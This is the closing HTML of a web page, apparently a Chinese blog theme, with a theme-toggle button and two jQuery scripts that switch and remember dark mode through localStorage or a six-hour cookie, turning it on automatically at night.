    <a class="btn-floating btn-large waves-effect waves-light" onclick="switchNightMode()" title="切换主题" >
      <i id="sum-moon-icon" class="fas fa-sun" style="width:48px; height:48px; font-size: 28px;"></i>
    </a>
  </div>
  
  <script>
    function switchNightMode() {
      $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
          $('body').hasClass('DarkMode') 
          ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
          : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
          setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
              $(this).remove()
            })
          }, 2e3)
        })
    }
  
    //黑夜模式自动开启功能（首次加载）
    setTimeout(function () {
      if (localStorage.getItem('isDark') == null) {
        if ((new Date().getHours() >= 19 || new Date().getHours() < 7) && !$('body').hasClass('DarkMode')) {
          $('body').addClass('DarkMode');
          localStorage.setItem('isDark', '1');
          $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon');
        }
      } else {
        /* 模式判断 */
        if (localStorage.getItem('isDark') === '1') {
          document.body.classList.add('DarkMode');
          $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon');
        } else {
          document.body.classList.remove('DarkMode');
          $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon');
        }
      }
    }, 0);
  </script>
  

  <script>
    // 在这里修改 isDark 变量过期的时间
    var isDarkLiveHours = 6;
  
    function setCookie(name, value, hoursToLive) {
      var cookie = name + "=" + encodeURIComponent(value);
      
      if (typeof hoursToLive === "number") {
        cookie += ";path=/;max-age=" + (hoursToLive*60*60);
      }
  
      document.cookie = cookie;
    }
  
    function getCookie(name) {
      // 拆分 cookie 字符串
      var cookieArr = document.cookie.split(";");
     
      // 循环遍历数组元素
      for(var i = 0; i < cookieArr.length; i++) {
          var cookiePair = cookieArr[i].split("=");
         
          /* 删除 cookie 名称开头的空白并将其与给定字符串进行比较 */
          if(name == cookiePair[0].trim()) {
              // 解码cookie值并返回
              return decodeURIComponent(cookiePair[1]);
          }
      }
      // 如果未找到，则返回null
      return null;
    }
  
    function switchNightMode() {
      $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
      setTimeout(function() {
        $('body').hasClass('DarkMode')
        ? (
          $('body').removeClass('DarkMode'),
          setCookie('isDark', 'false', isDarkLiveHours),
          $('#day-btn-icon-sun').css('display', 'none'),
          $('#night-btn-icon-moon').css('display', 'inherit')
        ) : (
          $('body').addClass('DarkMode'),
          setCookie('isDark', 'true', isDarkLiveHours),
          $('#day-btn-icon-sun').css('display', 'inherit'),
          $('#night-btn-icon-moon').css('display', 'none')
        ),
  
        setTimeout(function () {
          $('.Cuteen_DarkSky').fadeOut(1e3, function () {
            $(this).remove()
          })
        }, 2e3);
      });
    }
  
    //黑夜模式自动开启功能（首次加载）
    setTimeout(function () {
      if (getCookie('isDark') == null) {
        if ((new Date().getHours() >= 19 || new Date().getHours() < 7) && !$('body').hasClass('DarkMode')) {
          $('body').addClass('DarkMode');
          setCookie('isDark', 'true', isDarkLiveHours);
          $('#day-btn-icon-sun').css('display', 'inherit');
          $('#night-btn-icon-moon').css('display', 'none');
        }
      } else {
        if (getCookie('isDark') === 'true') {
          document.body.classList.add('DarkMode');
          $('#day-btn-icon-sun').css('display', 'inherit');
          $('#night-btn-icon-moon').css('display', 'none');
        } else {
          document.body.classList.remove('DarkMode');
          $('#day-btn-icon-sun').css('display', 'none');
          $('#night-btn-icon-moon').css('display', 'inherit');
        }
      }
  
    }, 0);
  </script>
  
  


</body>

</html>
